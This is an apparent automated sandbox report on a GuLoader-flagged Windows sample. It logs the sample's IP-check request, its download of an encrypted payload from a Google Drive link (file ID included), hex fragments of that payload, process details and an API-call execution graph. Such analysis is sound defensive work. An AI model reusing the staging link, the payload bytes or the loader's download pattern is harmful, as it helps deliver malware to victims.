Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:15:37.724399090 CET | 1.1.1.1 | 192.168.2.10 | 0xe616 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49710 | 193.122.130.0 | 80 | 4216 | C:\Users\user\Desktop\4AMVusDMPP.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:15:37.734148026 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:15:41.206324100 CET | 745 | IN | HTTP/1.1 504 Gateway Time-out
Date: Sat, 11 Jan 2025 00:15:41 GMT
Content-Type: text/html
Content-Length: 557
Connection: keep-alive
X-Request-ID: 3aaf336c65046926d2cf8fd4c0706e03
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 142.250.181.238 | 443 | 4216 | C:\Users\user\Desktop\4AMVusDMPP.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:15:33 UTC | 216 | OUT | GET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2025-01-11 00:15:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 00:15:33 GMT
Location: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-XS9reTacrSwMaK-j51ul-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49709 | 172.217.16.193 | 443 | 4216 | C:\Users\user\Desktop\4AMVusDMPP.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:15:34 UTC | 258 | OUT | GET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-01-11 00:15:36 UTC | 4952 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AFIdbgRUYtRq6jVze_kXH0nOoyS_1AMIGxKiGDGD-ljE3KYLA2iuOnzJdgEFPUErCxNRy0FEGY4EEAM
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="rHVoEDpSURjslGUowqcymW181.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 94272
Last-Modified: Sun, 08 Dec 2024 19:37:01 GMT
Date: Sat, 11 Jan 2025 00:15:36 GMT
Expires: Sat, 11 Jan 2025 00:15:36 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=IsxT1Q==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2025-01-11 00:15:36 UTC | 4952 | IN | Data Raw: 8c 42 1b 48 4d b8 13 66 0c 48 ea 52 0a 01 d1 fb 13 7a c1 5c 64 ac 0a 71 2f 66 af 06 11 6f 67 d0 2f 8a 7c 22 b9 96 33 e9 5a f4 41 08 3d 30 80 0c 25 c2 5e 88 01 8d ff 97 ad 59 8d b1 a2 81 a9 13 a2 84 7f c2 3c d7 e1 db 2a 39 8b 5b b8 51 da f2 b4 03 e8 c3 1c 5d 0d 9d 2b b2 4d 59 52 54 bd 7a 15 68 27 a3 3d f1 d2 42 0b 2a f9 53 3e dd ca d8 aa 62 3a fb e0 96 c5 17 12 8f 4f 22 e2 a1 da ff 42 92 17 85 88 d2 22 e5 9a a6 6c 82 c3 ce cf c9 9b fb b1 4a e2 9a 87 60 05 88 ef 16 22 5d 8b 25 fa bf b8 fb 56 a2 52 49 2a 2b ab f4 51 f6 74 7e a9 a9 a3 bc 35 ab b0 4d 80 1b 2a 49 d0 21 f2 df 1f 0c 63 79 74 85 64 1f ca 41 9c 6a 9c fe 2e 91 e6 69 17 55 3f 38 b1 b7 dc 7d 0e 2b 92 9c b3 a1 7b fc 39 1d 87 1e 0b b7 ca fb ba 6f 84 9c 17 cc f8 7c c4 a2 c8 d8 24 63 34 ec 63 43 b9 ca 1c
Data Ascii: BHMfHRz\dq/fog/|"3ZA=0%^Y<*9[Q]+MYRTzh'=B*S>b:O"B"lJ`"]%VRI*+Qt~5M*I!cytdAj.iU?8}+{9o|$c4cC
2025-01-11 00:15:36 UTC | 4793 | IN | Data Raw: 92 4a 8c f9 8a 93 24 80 3a 25 f1 88 4d e4 d4 bd 46 fd db 57 5e 33 fd 4c 18 ab 73 37 83 b4 b2 4f 9f c9 73 5b d0 0c 49 be b4 3c d4 34 b6 78 ec e6 de ea 36 5d c2 84 29 ff 13 3c 17 84 74 ef 71 99 86 11 0d 8f be c8 58 92 b2 0a 21 28 db 00 e6 23 01 81 1c df 8f ea cd 30 08 a5 c7 5f 3c 65 05 8f bf 19 1f 83 fe c0 0e b7 20 6d 50 e4 6c 3c 27 9d 90 cc d2 e6 cd bf 94 08 94 6d 38 67 58 34 b8 3b 51 89 6c 12 89 e0 cc 56 bd ea cd 46 46 12 11 bd 54 6c 35 8f 33 d3 7e 4b dd 61 25 78 6b ba 44 06 2a da 9d cb 7f 90 77 25 df 7d b9 b2 0c 13 07 ec 94 48 c7 ed 4d 48 6c 66 5e 19 d7 d7 53 6b c5 d0 c9 bd da a0 71 41 e9 61 86 91 62 a9 83 67 a5 b7 6e ab b1 16 a9 90 44 69 64 04 67 1f 94 a2 df 6e 9d 30 ff 6d cd b7 13 2e 64 8f 7c 64 a1 b3 99 d6 5b 43 34 6c 05 51 78 13 87 f5 6a a8 d4 fe 56
Data Ascii: J$:%MFW^3Ls7Os[I<4x6])<tqX!(#0_<e mPl<'m8gX4;QlVFFTl53~Ka%xkD*w%}HMHlf^SkqAabgnDidgn0m.d|d[C4lQxjV
2025-01-11 00:15:36 UTC | 1325 | IN | Data Raw: d6 8d cc 60 fa 9b 29 51 9f 7d d7 40 d7 29 60 97 09 f8 4d 3c 0a 2f a5 86 eb 80 49 fd 59 ab 1d c1 7c 71 9b 4e f4 74 fc 89 c5 de b7 39 27 c4 4f 6e e9 1b 9b 6a 7b c5 18 07 30 1b 30 1d fc 3c fa 26 ed 59 eb 18 1a 13 1b 34 ef 94 40 90 bd 2c 11 c6 ec 2c 14 e5 17 1e 42 b0 c7 06 d5 2b 98 d2 cf 1c 6c ff 48 5b f1 6e b5 3b 98 7b 71 bd 31 4c 3e c6 d0 76 aa 11 35 a3 53 e7 48 ba 03 a4 f7 d5 08 5d 32 17 74 f8 13 36 b4 54 23 b8 25 99 bb 58 16 96 0d 4d 70 e8 1c c0 43 e9 cb 76 ac b8 61 9e 6b 4a 05 b0 52 1a 2e a1 a0 4c 0c 90 4c 2a ba ab 41 89 ff 9f 09 ea e6 89 e2 77 8f b4 f2 16 a1 51 37 20 69 37 53 e9 63 b2 a6 7e bf 43 bd 4f 1b 7d ef eb 66 ad 90 08 f9 18 e2 2b f4 5e 4d 6b 77 6b 8b 99 ed 70 62 06 14 6a 3c e9 93 b1 dc cf 7b 50 3c f6 f4 7d 14 a1 c5 55 e6 9f 1b 1d d9 ad 04 9b 9f
Data Ascii: `)Q}@)`M</IY|qNt9'Onj{00<&Y4@,,B+lH[n;{q1L>v5SH]2t6T#%XMpCvakJR.LL*AwQ7 i7Sc~CO}f+^Mkwkpbj<{P<}U
2025-01-11 00:15:36 UTC | 1390 | IN | Data Raw: 7a 30 d4 d9 91 52 76 fc 63 ab f6 8b c0 23 7b 99 2c d9 54 25 84 32 fb 38 62 e5 d0 96 54 35 61 c3 74 86 ed 28 11 ad 2b ed 0c c4 1a d1 c5 1f fd 1b 3e 8b be 93 15 1c 3f 9e fd 7b e9 61 39 40 de 4b 71 70 6e 1f 4e 16 fe 3e 85 7a e9 71 a1 30 cb 19 9b 31 92 d8 44 90 ab 2e 39 31 ec 2c 1e e5 22 0d 47 07 56 d8 da 1d 9a 2c c8 10 6e 84 15 34 f0 6a cb 62 98 a7 7b be 67 4c 3e e6 db 60 b9 15 26 a7 62 ea 30 56 45 ab f7 d1 20 8e 29 27 74 f8 59 35 b6 2f 45 b8 25 8c c5 78 cf 96 07 6f 2f f2 91 f5 48 ee d9 56 ab cf 87 86 69 41 ed 95 45 6c e0 67 a0 3c a4 b5 54 58 ba c6 09 f9 5d be 6e cb f8 9f e8 2f 79 b8 e6 0f a9 43 a9 b7 78 31 7e c1 77 b7 30 7e bf 4d e7 a6 0d 7d 95 84 b9 ad 92 79 17 3d f5 51 54 0d 4d 61 0f ae c9 99 9d 15 b0 0f 07 67 8f cb a7 c2 00 b4 37 5a 4e 16 cb ae 64 ce 10
                                                        Data Ascii: z0Rvc#{,T%28bT5at(+>?{a9@KqpnN>zq01D.91,"GV,n4jb{gL>`&b0VE )'tY5/E%xo/HViAElg<TX]n/yCx1~w0~M}y=QTMag7ZNd
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e7 a4 65 ea 11 9b 6f 56 a6 71 7a 77 08 3c 0f ed 33 b9 82 ef 59 ef 21 c7 02 16 a4 81 d6 51 9e ca c2 11 ec e6 3f 1b e7 29 0d 4c 58 97 1c d5 7f f7 39 de 1c 64 93 d8 34 1e 6a cb 62 8b 6b 6a 9b 17 18 24 cc aa 58 f7 15 24 ad 6c fb 5b d0 5c d7 07 d1 20 84 21 05 6f ea 7c c7 b6 2f 63 0f 36 8e d4 18 01 4c 10 b3 a9 b1 1c ca 49 fd cc 65 ae a8 3f 71 6c 31 3f a3 44 0f 14 63 b4 5a 17 83 23 d8 b8 d0 03 af ee 8f 61 28 c6 59 e8 5f db 4a f3 0f ba 48 33 35 61 20 66 c8 67 df fd 66 bf 6c 90 9c 0c 6e fd eb 77 be 85 a9 a6 02 f4 3c 91 35 7b 69 7d 43 ce 8d fc 61 fe 10 27 5c 3a ff ab ad c5 25 28 2f 13 fc cd ba 05 ba 5e 4a db 61 30 0b 27 b7 1f 90 89 e3 3d f8 af 82 ef c5 97 9a 7f 4e d0 52 3c fa 50 1a cb 35 27 d6 ab e4 d4 3f c2 b2 03 00 94 12 b6 6d bb 97 54 50 30 12 5f df 66 92 a1 c2
                                                        Data Ascii: eoVqzw<3Y!Q?)LX9d4jbkj$X$l[\ !o|/c6LIe?ql1?DcZ#a(Y_JH35a fgflnw<5{i}Ca'\:%(/^Ja0'=NR<P5'?mTP0_f
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e7 42 4a 68 98 71 6d 6b 64 47 39 e0 de 67 b3 3e 21 a7 69 e0 61 c1 43 8e f7 d1 3b be 34 17 6c f9 13 36 87 2f 69 a9 25 9f b7 c3 0d 96 77 4d 6a e8 1c c0 43 f8 55 2a bd bd 4c 9f 6e 19 b7 b0 52 14 10 8c a1 41 0f 83 49 3b bd fc 00 9d ec 9f 77 81 3b 89 e8 5f db c6 10 07 ad 29 3a 55 81 31 7f ee 66 e1 14 7e bf 4d bd 67 1b 7d ef f8 60 bc 94 1c 49 18 e2 25 99 05 66 28 6c 4b b0 e7 ed 7a 65 27 3d 6d 2d e4 ac b5 cf bd 43 cd 3c f2 dd bd 1e b0 c5 3a 1b 9f 31 17 ca bd 25 9a 8c fc 30 e5 9f 88 e3 de e5 5d 86 4f da 45 42 13 43 04 d0 4e 36 cc 3a c6 38 55 c2 b8 1a 13 85 0c a4 63 9b 3d d4 50 3a 30 02 d2 77 95 9f 64 ba 0e ad ad f8 b1 76 56 96 34 8e c0 c0 0e 89 af ef 3d 8f 5a 99 fb 90 63 a2 d1 ba 14 65 67 04 df e3 01 04 09 35 3e 9c 49 a8 be ec db e6 21 4d 5b a6 7a 9e 9b 1a b8 3a
                                                        Data Ascii: BJhqmkdG9g>!iaC;4l6/i%wMjCU*LnRAI;w;_):U1f~Mg}`I%f(lKze'=m-C<:1%0]OEBCN6:8Uc=P:0wdvV4=Zceg5>I!M[z:
                                                        2025-01-11 00:15:36 UTC1390INData Raw: ea 4c 93 69 5b 4e b0 52 0e 06 72 a0 08 06 90 4d 31 88 d4 09 f5 fe 9b 77 8a e6 89 f9 5f c4 a8 da c4 ad 59 2e 54 58 2c 7f 94 49 87 ee 7e b5 4d 95 9a 33 85 e5 eb 6c a6 95 4a f3 19 e2 2f 8c 7e 9a 6b 7d 45 d3 91 9f 20 73 0f 77 02 ff ee bf ba f8 bc 58 83 3c f2 da b9 ce b2 c9 43 f5 98 09 0a d8 b6 34 99 8e f7 53 81 af 91 82 bb 5f a3 86 49 dd 5a 3c eb 31 7a c6 21 46 a2 ef cc 10 39 d1 bc 18 0e 82 7e 38 6e 93 22 3b 85 3a 3a 17 cc 63 89 b7 fc f7 19 bc a3 9e a8 67 5e bb 5b 85 f9 cb 7a 98 a5 80 38 e1 5b 93 94 9f 62 7e d3 1c e9 7e bd 15 16 fd c6 80 44 cb 3f 8e 50 be bc e1 34 e0 24 4e c4 c4 4d 52 9b d6 b8 3a a9 e2 61 f2 cc e2 b1 5d f6 08 3f cf 25 34 30 fe 4a 59 b0 71 66 50 57 f5 e7 8f 80 0e d6 99 8f 49 b5 61 f0 03 5c 8a a9 ad 03 20 16 35 fa 04 59 cb cb bd 47 af c5 6a 5f
                                                        Data Ascii: Li[NRrM1w_Y.TX,I~M3lJ/~k}E swX<C4S_IZ<1z!F9~8n";::cg^[z8[b~~D?P4$NMR:a]?%40JYqfPWIa\ 5YGj_
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e0 ef a9 18 92 40 5f 0d 4d 6d 6e 46 ce 9c c5 e9 6f 0f 01 7e 25 ff b7 90 9d b2 1f 53 3d f2 d6 c1 10 a0 cf 5f 89 9a 30 1d d3 9e a0 91 9f f6 32 e0 a2 98 e6 2a 8b b0 8c 5e da 44 d3 ed 50 0f cb 2a 1a db 12 66 10 3f c8 a9 15 70 da 0c a4 78 82 5b 7c c5 3a 3a 17 cc 63 98 b2 d4 4f 39 bc 8d 27 a0 76 5c 9f 09 84 a3 54 67 98 df 80 e9 e0 5b 9f 94 c5 63 7e d3 1c c1 7e bd 15 16 f1 d7 98 54 47 dc 98 5a df a0 df 4b e1 37 4f c3 31 62 55 b6 0e 5a 3f a3 83 72 b5 12 e2 b1 5d f1 ff 14 05 36 38 27 e1 63 14 ad fc 72 70 57 dc 68 99 f2 e2 ca 88 f8 99 0c 6a f9 d1 16 47 db 81 10 4f 39 97 df 17 60 73 69 98 5b ce 86 7f 4e 96 47 15 c9 1c fd 99 77 45 ed e1 35 9a 6b 0f dc 3d 4b da 09 f2 4b 59 77 27 51 c1 fb 6e 68 a8 44 6f d5 45 1d 59 ec 12 04 ce 09 7a b3 5b 08 2f e6 80 66 a6 a1 88 a2 50
                                                        Data Ascii: @_MmnFo~%S=_02*^DP*f?px[|::cO9'v\Tg[c~~TGZK7O1bUZ?r]68'crpWhjGO9`si[NGwE5k=KKYw'QnhDoEYz[/fP
                                                        2025-01-11 00:15:36 UTC1390INData Raw: 3d 32 57 2d 9c 55 2c 5b 21 36 c7 2c 32 13 2e c7 ca f2 1a 85 7c b2 5a 12 52 54 5a 2c c4 12 80 75 94 a3 d8 48 54 a1 28 b2 a0 76 57 b2 0e f1 37 dc 7b e8 0d ca 2b e9 f9 bc e3 e8 4f 6b d9 44 df 5b a4 02 01 56 f2 93 22 73 2b 9d 2a 0d 93 ec db e4 95 60 c9 bd aa 66 b3 0c 1a 12 03 f3 64 97 80 ef cf 58 e7 01 13 4b 28 1c 78 ed 4f 53 30 7e 4d 70 53 dd 4d 9e 87 13 08 9b 8f 2a 2e 6c f6 4d d3 a1 56 52 05 4f 97 25 df 26 42 77 cb b7 52 b2 c0 42 1c e6 e5 3a 0c 0d f8 11 13 45 9f cf 15 9a 1b ad e7 9d 4b da 54 e0 46 27 12 26 51 c5 fa 63 40 e6 00 6f df c4 09 69 e8 16 78 cf 18 7d 97 8d 1b 39 f7 98 6b 88 47 68 5c a5 6a 5e 38 70 43 84 2d 31 ac d9 23 ab 01 1f 62 03 b8 d9 1e 03 ab 5a 44 0a e5 fb 2b f4 28 33 c8 a0 84 1a e4 44 9b 67 1b 9d 7a df b8 54 88 fe c2 18 a6 0c 97 34 22 88 1b
                                                        Data Ascii: =2W-U,[!6,2.|ZRTZ,uHT(vW7{+OkD[V"s+*`fdXK(xOS0~MpSM*.lMVRO%&BwRB:EKTF'&Qc@oix}9kGh\j^8pC-1#bZD+(3DgzT4"
                                                        2025-01-11 00:15:36 UTC1390INData Raw: 99 fb 44 73 5b f1 07 7d 7e b7 00 0b f4 ff db 50 35 34 43 5a af 9c b6 d6 e1 37 45 d5 cf 61 57 b3 7c b8 6d a2 f3 64 f7 92 e2 b1 47 e7 01 17 1e 25 34 37 f6 7f 5d b0 0d 4c 70 57 ee 4d 8f 91 04 c1 94 a0 e3 29 7d fa 01 aa 7a a9 dd 2d 01 49 35 f0 04 71 71 e3 45 41 bc ca 61 49 df a3 31 d2 0d fe 48 85 59 9f c9 19 92 69 f7 e8 9d 3b b5 d1 e1 46 21 5e 2f 3e 16 ea 63 46 f1 9e 7c d9 d3 01 5e d4 01 05 ce 18 75 b5 8a 69 40 eb 87 07 cf 4a 68 5c a9 15 65 0a 77 41 d2 7f 31 dc bc fc ab 07 31 89 07 b0 c2 12 76 0e 00 45 7a 8a 28 58 23 2e 20 cb bd 89 40 2d 58 9b 11 67 47 6b d7 92 31 86 b9 12 19 a6 00 ef ea 30 8e 07 ba 4f 1b 5e 61 9c 80 ce 97 4d 84 0b bf b1 72 91 db 34 f4 ab 18 9e 98 5b 3f 66 61 99 66 90 d1 29 fc 52 8a 2b 2a 9e a9 5f e4 de a8 67 5e 4e 57 54 35 30 45 18 a2 5f 1b
                                                        Data Ascii: Ds[}~P54CZ7EaW|mdG%47]LpWM)}z-I5qqEAaI1HYi;F!^/>cF|^ui@Jh\ewA11vEz(X#. @-XgGk10O^aMr4[?faf)R+*_g^NWT50E_



                                                        Target ID:0
                                                        Start time:19:14:54
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\4AMVusDMPP.exe"
                                                        Imagebase:0x400000
                                                        File size:997'399 bytes
                                                        MD5 hash:ED6F1C14E085E4FBC7C47F894F2140B9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:19:15:23
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\4AMVusDMPP.exe"
                                                        Imagebase:0x400000
                                                        File size:997'399 bytes
                                                        MD5 hash:ED6F1C14E085E4FBC7C47F894F2140B9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:19:15:41
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
                                                        Imagebase:0x3f0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:20%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.9%
                                                          Total number of Nodes:1570
                                                          Total number of Limit Nodes:39
                                                          execution_graph 4127 401941 4128 401943 4127->4128 4133 402c41 4128->4133 4134 402c4d 4133->4134 4179 40640a 4134->4179 4137 401948 4139 405afa 4137->4139 4221 405dc5 4139->4221 4142 405b22 DeleteFileW 4144 401951 4142->4144 4143 405b39 4145 405c64 4143->4145 4235 4063e8 lstrcpynW 4143->4235 4145->4144 4264 40672b FindFirstFileW 4145->4264 4147 405b5f 4148 405b72 4147->4148 4149 405b65 lstrcatW 4147->4149 4236 405d09 lstrlenW 4148->4236 4150 405b78 4149->4150 4153 405b88 lstrcatW 4150->4153 4154 405b7e 4150->4154 4156 405b93 lstrlenW FindFirstFileW 4153->4156 4154->4153 4154->4156 4158 405c59 4156->4158 4168 405bb5 4156->4168 4157 405c82 4267 405cbd lstrlenW CharPrevW 4157->4267 4158->4145 4161 405c3c FindNextFileW 4165 405c52 FindClose 4161->4165 4161->4168 4162 405ab2 5 API calls 4164 405c94 4162->4164 4166 405c98 4164->4166 4167 405cae 4164->4167 4165->4158 4166->4144 4171 405450 24 API calls 4166->4171 4170 405450 24 API calls 4167->4170 4168->4161 4172 405afa 60 API calls 4168->4172 4175 405450 24 API calls 4168->4175 4240 4063e8 lstrcpynW 4168->4240 4241 405ab2 4168->4241 4249 405450 4168->4249 4260 4061ae MoveFileExW 4168->4260 4170->4144 4173 405ca5 4171->4173 4172->4168 4174 4061ae 36 API calls 4173->4174 4176 405cac 4174->4176 4175->4161 4176->4144 4194 406417 4179->4194 4180 406662 4181 402c6e 4180->4181 4212 4063e8 lstrcpynW 4180->4212 4181->4137 4196 40667c 4181->4196 4183 406630 lstrlenW 4183->4194 4184 40640a 10 API calls 4184->4183 4188 406545 GetSystemDirectoryW 4188->4194 4189 406558 GetWindowsDirectoryW 4189->4194 4190 40667c 5 API calls 4190->4194 4191 40640a 10 API calls 4191->4194 4192 4065d3 lstrcatW 4192->4194 4193 40658c SHGetSpecialFolderLocation 4193->4194 4195 4065a4 SHGetPathFromIDListW CoTaskMemFree 4193->4195 4194->4180 4194->4183 4194->4184 4194->4188 4194->4189 4194->4190 4194->4191 4194->4192 4194->4193 4205 4062b6 4194->4205 4210 40632f wsprintfW 4194->4210 4211 4063e8 
lstrcpynW 4194->4211 4195->4194 4203 406689 4196->4203 4197 4066ff 4198 406704 CharPrevW 4197->4198 4201 406725 4197->4201 4198->4197 4199 4066f2 CharNextW 4199->4197 4199->4203 4201->4137 4202 4066de CharNextW 4202->4203 4203->4197 4203->4199 4203->4202 4204 4066ed CharNextW 4203->4204 4217 405cea 4203->4217 4204->4199 4213 406255 4205->4213 4208 40631a 4208->4194 4209 4062ea RegQueryValueExW RegCloseKey 4209->4208 4210->4194 4211->4194 4212->4181 4214 406264 4213->4214 4215 406268 4214->4215 4216 40626d RegOpenKeyExW 4214->4216 4215->4208 4215->4209 4216->4215 4218 405cf0 4217->4218 4219 405d06 4218->4219 4220 405cf7 CharNextW 4218->4220 4219->4203 4220->4218 4270 4063e8 lstrcpynW 4221->4270 4223 405dd6 4271 405d68 CharNextW CharNextW 4223->4271 4225 405b1a 4225->4142 4225->4143 4227 40667c 5 API calls 4233 405dec 4227->4233 4228 405e1d lstrlenW 4229 405e28 4228->4229 4228->4233 4231 405cbd 3 API calls 4229->4231 4230 40672b 2 API calls 4230->4233 4232 405e2d GetFileAttributesW 4231->4232 4232->4225 4233->4225 4233->4228 4233->4230 4234 405d09 2 API calls 4233->4234 4234->4228 4235->4147 4237 405d17 4236->4237 4238 405d29 4237->4238 4239 405d1d CharPrevW 4237->4239 4238->4150 